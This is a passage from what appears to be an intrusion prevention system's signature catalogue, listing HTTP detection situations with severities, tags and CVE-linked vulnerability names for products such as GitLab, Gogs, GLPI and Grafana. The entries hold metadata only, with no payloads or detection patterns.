Tags: Windows, Unix, Linux, Any Hardware, GeoServer, CVE2024, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1754-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: GeoServer-Unauthenticated-Remote-Code-Execution-CVE-2024-36401
Description:
Back to top

HTTP_CRL-Gestart-Aide-Php-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in GestArt aide.php was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GestArt, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: Gestart-Php-Remote-File-Inclusion-Vulnerability
Description:
Back to top

HTTP_CRL-GetSimpleCMS-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in GetSimpleCMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GetSimpleCMS, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: GetSimpleCMS-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Geutebruck-Instantrec-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Geutebruck devices detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Geutebruck, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: Geutebruck-Instantrec-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Geutebruck-Multiple-RCE-CVE-2021-335xx

About this situation: An attempt to exploit a vulnerability in Geutebruck devices detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Geutebruck, CVE2021, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Geutebruck-Multiple-RCE-CVE-2021-335xx
Description:
Back to top

HTTP_CRL-Ghost-CMS-Content-API-Filtering-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Ghost Foundation Ghost detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ghost Foundation Ghost, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1590-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Ghost-CMS-Content-API-Filtering-Information-Disclosure
Description:
Back to top

HTTP_CRL-Gibbon-Edu-Arbitrary-File-Write-CVE-2023-45878

About this situation: An attempt to exploit a vulnerability in Gibbon Edu detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gibbon Edu, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Vulnerability: Gibbon-Edu-Arbitrary-File-Write-CVE-2023-45878
Description:
Back to top

HTTP_CRL-Gibbon-School-Platform-Authenticated-PHP-Deserialization-Vulnerability

About this situation: An attempt to exploit a vulnerability in Gibbon Edu detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gibbon Edu, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Gibbon-School-Platform-Authenticated-PHP-Deserialization-Vulnerability
Description:
Back to top

HTTP_CRL-Gila-CMS-DeleteAction-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Gila CMS Gila detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gila CMS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1222-5242
Vulnerability: Gila-CMS-DeleteAction-Local-File-Inclusion
Description:
Back to top

HTTP_CRL-Gitea-And-Gogs-Git-Hooks-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Gitea/Gogs.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Gogs, CVE2020, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Gogs-Git-Hooks-Remote-Code-Execution
Gitea-Git-Hooks-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Gitlab-Abstract_reference_filter-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: Gitlab-Abstract_reference_filter-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Gitlab-Account-Hijacking-Vulnerability-CVE-2023-7028

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1675-5242
Last changed: sgpkg-ips-1675-5242
Vulnerability: Gitlab-Account-Hijacking-Vulnerability-CVE-2023-7028
Description:
Back to top

HTTP_CRL-Gitlab-Arbitrary-File-Read-Vulnerability-CVE-2023-2825

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1593-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Gitlab-Arbitrary-File-Read-Vulnerability-CVE-2023-2825
Description:
Back to top

HTTP_CRL-Gitlab-Branch-Name-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Vulnerability: Gitlab-Branch-Name-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-CVE-2023-0921-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1623-5242
Last changed: sgpkg-ips-1718-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-CVE-2023-0921-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Filefinder-Regex-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in GitLab
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Filefinder-Regex-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Glm_Source-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in GitLab
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Glm_Source-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Kroki-Diagram-Stored-XSS

About this situation: An attempt to exploit a vulnerability in GitLab, GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1586-5242
Last changed: sgpkg-ips-1586-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Kroki-Diagram-Stored-XSS
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Markdown-Render-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1758-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Markdown-Render-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Merge-Requests-Stored-XSS

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Merge-Requests-Stored-XSS
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Milestone-References-Stored-XSS

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1483-5242
Last changed: sgpkg-ips-1483-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Milestone-References-Stored-XSS
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Notes-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Notes-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Profile-Page-Stored-XSS

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Profile-Page-Stored-XSS
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Saml-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE)
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Saml-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Gitlab-Community-And-Enterprise-Edition-Web-IDE-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1637-5242
Last changed: sgpkg-ips-1637-5242
Vulnerability: Gitlab-Community-And-Enterprise-Edition-Web-IDE-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Vulnerability: Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Gitlab-Gollum-Link-Regex-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1772-5242
Last changed: sgpkg-ips-1772-5242
Vulnerability: Gitlab-Gollum-Link-Regex-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Gitlab-Graphql-API-User-Enumeration

About this situation: An attempt to exploit a vulnerability in GitLab detected.
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, GitLab, CVE2021, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Vulnerability: Gitlab-Graphql-API-User-Enumeration
Description:
Back to top

HTTP_CRL-Gitlab-Label-Description-Emoji-Uncontrolled-Resource-Consumption

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Vulnerability: Gitlab-Label-Description-Emoji-Uncontrolled-Resource-Consumption
Description:
Back to top

HTTP_CRL-Gitlab-Mermaid-Markdown-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Gitlab-Mermaid-Markdown-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Gitlab-oauth-Page-Stored-XSS-CVE-2024-6530

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: Gitlab-oauth-Page-Stored-XSS-CVE-2024-6530
Description:
Back to top

HTTP_CRL-Gitlab-Project-Settings-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1489-5242
Last changed: sgpkg-ips-1489-5242
Vulnerability: Gitlab-Project-Settings-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Gitlab-Wiki-API-Attachments-Command-Injection

About this situation: An attempt to exploit a vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab Wiki, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1122-5242
Vulnerability: Gitlab-Wiki-API-Attachments-Command-Injection
Description:
Back to top

HTTP_CRL-Gitlist-Argument-Injection-Vulnerability-CVE-2018-1000533

About this situation: An attempt to exploit a vulnerability in GitList detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gitlist, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Gitlist-Argument-Injection-Vulnerability-CVE-2018-1000533
Description:
Back to top

HTTP_CRL-GitStack-Remote-Code-Execution-Vulnerability

About this situation: A GitStack Remote Code Execution Vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, GitStack, CVE2018, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Vulnerability: GitStack-Remote-Code-Execution-Vulnerability
Description:
Back to top

HTTP_CRL-GitStack-Unauthenticated-Rest-API-Requests

About this situation: A GitStack Unauthenticated REST API Requests Vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitStack, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: GitStack-Unauthenticated-Rest-API-Requests
Description:
Back to top

HTTP_CRL-GitStack-Unsanitized-Argument-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in GitStack detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GitStack, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1134-5242
Last changed: sgpkg-ips-1134-5242
Vulnerability: GitStack-Unsanitized-Argument-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-GiveWP-Unauthenticated-Donation-Process-Exploit

About this situation: An attempt to exploit a vulnerability in the GiveWP Donation Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Wordpress GiveWP Plugin, CVE2024, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: GiveWP-Unauthenticated-Donation-Process-Exploit
Description:
Back to top

HTTP_CRL-GiveWP-Unauthenticated-Donation-Process-Exploit-2

About this situation: An attempt to exploit a vulnerability in WordPress Project GiveWP Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Wordpress GiveWP Plugin, CVE2024, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: GiveWP-Unauthenticated-Donation-Process-Exploit
Description:
Back to top

HTTP_CRL-GLPI-Auth.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in GLPI-Project GLPI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Vulnerability: GLPI-Auth.php-SQL-Injection
Description:
Back to top

HTTP_CRL-GLPI-Computervirtualmachine-SQL-Injection

About this situation: An attempt to exploit a vulnerability in GLPI-Project GLPI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: GLPI-Computervirtualmachine-SQL-Injection
Description:
Back to top

HTTP_CRL-GLPI-install.php-Remote-Command-Execution

About this situation: GLPI Remote Command Execution attack detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-569-5211
Vulnerability: GLPI-install.php-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Gmail-Web-Interface-Usage

About this situation: Detects Gmail web interface usage
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-233-3038
Vulnerability: Gmail-Web-Interface-Usage
Description:
Back to top

HTTP_CRL-GoAnywhere-MFT-Remote-Code-Execution-CVE-2023-0669

About this situation: An attempt to exploit a vulnerability in GoAnywhere MFT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, GoAnywhere MFT, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1557-5242
Vulnerability: GoAnywhere-MFT-Remote-Code-Execution-CVE-2023-0669
Description:
Back to top

HTTP_CRL-Gogs-File-Upload-Tree_path-Command-Injection

About this situation: An attempt to exploit a vulnerability in Gogs detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gogs, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Vulnerability: Gogs-File-Upload-Tree_path-Command-Injection
Description:
Back to top

HTTP_CRL-Gogs-File-Upload-Tree_path-CVE-2022-2024-Command-Injection

About this situation: An attempt to exploit a vulnerability in Gogs Gogs detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gogs, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1570-5242
Last changed: sgpkg-ips-1570-5242
Vulnerability: Gogs-File-Upload-Tree_path-CVE-2022-2024-Command-Injection
Description:
Back to top

HTTP_CRL-Gogs-Full-Name-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Gogs detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gogs, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Vulnerability: Gogs-Full-Name-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Gogs-Repository-Contents-API-Path-Traversal

About this situation: An attempt to exploit a vulnerability in Gogs detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gogs, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Gogs-Repository-Contents-API-Path-Traversal
Description:
Back to top

HTTP_CRL-Google-Chrome-Xssauditor-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Google-Chrome-Xssauditor-Policy-Bypass
Description:
Back to top

HTTP_CRL-Google-Talk-Instant-Messaging-Web-Interface-Usage

About this situation: Google Talk instant messaging web interface usage detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-720-5211
Vulnerability: Google-Talk-Instant-Messaging-Network-Usage
Description:
Back to top

HTTP_CRL-Gozi-Malware-Infection-Traffic

About this situation: Gozi malware infection traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1410-5242
Last changed: sgpkg-ips-1410-5242
Vulnerability: Gozi-Malware-Infection-Traffic
Description:
Back to top

HTTP_CRL-Grafana-Labs-Grafana-CVE-2021-41174-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Grafana Labs Grafana detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Grafana, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Vulnerability: Grafana-Labs-Grafana-CVE-2021-41174-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Grafana-SQL-Expressions-Command-Injection-And-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Grafana
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Grafana, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1810-5242
Last changed: sgpkg-ips-1810-5242
Vulnerability: Grafana-SQL-Expressions-Command-Injection-And-Local-File-Inclusion
Description:
Back to top

HTTP_CRL-Grafana-Unified-Alerting-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Grafana detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Grafana, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1493-5242
Last changed: sgpkg-ips-1493-5242
Vulnerability: Grafana-Unified-Alerting-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Grandstream-UCM6200-SQL-Injection-CVE-2020-5722

About this situation: An attempt to exploit a vulnerability in Grandstream UCM6200 detected
Context: HTTP Normalized Request-Line
Severity: 7
